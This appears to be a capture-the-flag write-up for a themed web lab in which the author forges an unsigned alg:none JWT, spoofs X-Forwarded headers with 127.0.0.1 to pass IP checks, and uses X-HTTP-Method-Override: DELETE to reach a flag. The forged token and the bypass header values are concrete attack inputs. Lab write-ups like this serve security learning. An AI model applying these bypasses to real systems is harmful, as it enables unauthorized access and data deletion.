Tamper Temple
Temple Trust runs its order desk behind 'The Temple' — a freshly hardened portal bolted onto a v1 API nobody ever dared retire, watched over by 'developerDave', who's leaving and means to do damage on the way out. You're handed bob/temple123 to get through the front gate.
Room Description
https://dashboard.webverselabs-pro.com/events/tamper-temple
Briefing
Temple Trust runs its order desk behind "The Temple" — a freshly hardened portal bolted onto a v1 API nobody ever dared retire, watched over by a scribe, "developerDave", who's leaving and means to do damage on the way out. You're handed a guest account — bob / temple123 — to get through the front gate. Slip past the older gods behind it and convince the Temple you're admin before the production ledger walks out the door.
Initial Analysis
We are going to have ourself a themed story challenge!
We gotta scroll down for this and read the entire home page.
Okay, so it pretty much tells us what to do give or take, it's going to be a verb tampering situation.
From the page source we have the navigation menu:
<nav class="nav">
<a href="/" class="hide-sm">Sanctum</a>
<a href="/dev/" class="hide-sm">Dev</a>
<a href="/login" class="btn btn-ghost" style="padding:8px 16px;">Enter</a>
</nav>
And the two redirects "Enter the Temple" & "Read the Wards".
<div class="cta fade d3">
<a class="btn btn-gold" href="/login">Enter the Temple →</a>
<a class="btn btn-ghost" href="/robots.txt">Read the Wards</a>
</div>mi
While we are logged out, when we try to navigate to /dev, we get access denied, that we need to login.
Also /robots.txt has the /dev/ endpoint included, but nothing else.
Let's go ahead and login with the credentials given to us:
bob:temple123
We get a JWT assigned to us. Seems pretty small, there probably isn't much data to handle.
The dashboard has a new look to it, and we have access to new endpoints.
The Infra Logs takes us to a /logs endpoint that apparently is reserved for staff. Guess we'll have to figure out the username's of the staff and conduct a JWT attack.
Dev Artifacts takes us over to /dev and this time around we do have access, and there's a notes.txt file available for us.
DEV TODO (MUST FIX IN THIS ORDER !!!)
--------
- 404 error leaks internal username + our legacy token settings. FIX THIS (Pentest report said this is CRITICAL)
- The girl mentioned in the 404 error said she was able to get to /logs somehow???
- dave_token.txt is locked down to the developer workstation IP only. Does this need fixing?
And lastly, we have the API reference page:
We have two actions that are mentioned to be restricted, as well as a deprecated version of the service, we love to see that.
Finding the bug
Let's go ahead and make a call to /api/v2/me and see what our role is with our JWT.
Seems like it isn't that simple. Okay, let's follow the instructions from the notes file and cause a 404 error, we can do this by just trying to call an undefined page.
Alrighty, so we know there is a user called alice, and that the JWT attack we need to do is to use alg:none attacks.
Exploitation
We can do the JWT exploitation using jwt.io since it's a simple algorithm swap.
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWxpY2UifQ.
Open DevTools, open Application, plonk this in instead of our regular session cookie and refresh the dashboard.
Great, now we have a staff role, we can open up /logs.
Yikes, internal access only. Guess we aren't at the right location. Luckily there are ways to spoof this.
Sometimes, if we don't want the web application to look at our Host header, we can supply an X-Forwarded-For header, and the web application will defer to that.
https://portswigger.net/web-security/host-header/exploiting
As we've already discussed, websites are often accessed via some kind of intermediary system, such as a load balancer or a reverse proxy. In this kind of architecture, the Host header that the back-end server receives may contain the domain name for one of these intermediary systems. This is usually not relevant for the requested functionality.
To solve this problem, the front-end may inject theX-Forwarded-Hostheader, containing the original value of the Host header from the client's initial request. For this reason, when anX-Forwarded-Hostheader is present, many frameworks will refer to this instead. You may observe this behavior even when there is no front-end that uses this header.
You can sometimes useX-Forwarded-Hostto inject your malicious input while circumventing any validation on the Host header itself.
Useful github for some bypasses:
So, let's add in X-Forwarded-Host in our Request.
Hm, apparently localhost doesn't work, maybe we can try 127.0.0.1.
That does indeed work!
Does this mean that we should try and access /dev with the IP given through the X-Forwarded-For header? Let's give it a go.
That's absolutely right, we just do the same attack with a different value, let's take a look at dave_token.txt.
Aha, I guess that's why our call to the API didn't work, there's a different structure to the tokens it requires.
Yup, as we can see we have an extra role here, not just a username.
From our previous failed request towards /api/v2/me, we can just change the Authorization header with our new token.
{"sub": "developerDave", "role": "developer", "private_notes": "I'm leaving the company soon, so I'm going to cause some damage before I go. The team has a vuln they can't patch: the API still honors X-HTTP-Method-Override, and the old /api/v1/ service was never retired. I just need to figure out how the admin's password is being sent. Production data lives behind /api/v2/production."}
Okay, we definitely know the next steps, how about before that we try to do one of the other API actions?
I guess we aren't good enough, luckily we have Dave's private notes, as well as the warning label in the API reference hinting towards trying /api/v1 as well for /audit.
No dice, considering the name of the challenge and the fact we haven't faced any changing requests to GET, POST, PUT, DELETE etc, maybe this is our chance? (plus the hints surely aren't red herrings).
user=admin pass=th3-s4cr3d-scr0ll-0f-anubis
Well well well, let's go ahead and login with our new credentials, but we have through the other vulnerable API endpoint.
The credentials work with both API versions, so we don't need to be specific.
We got a new token with the following values:
Let's go ahead and make a request towards the last available API action. And not forget to put it in the Authorization header.
Well, that seems pretty empty? Nothing of value we can see here. It did say that the endpoint also took a DELETE request, let's go ahead and do that.
Alright, this is probably where the last part of Dave's private notes goes.
The team has a vuln they can't patch: the API still honors X-HTTP-Method-Override
We can just add in the following value to our previous GET request:
X-HTTP-Method-Override: DELETE
and voila:
The flag is bundled up there with the response headers.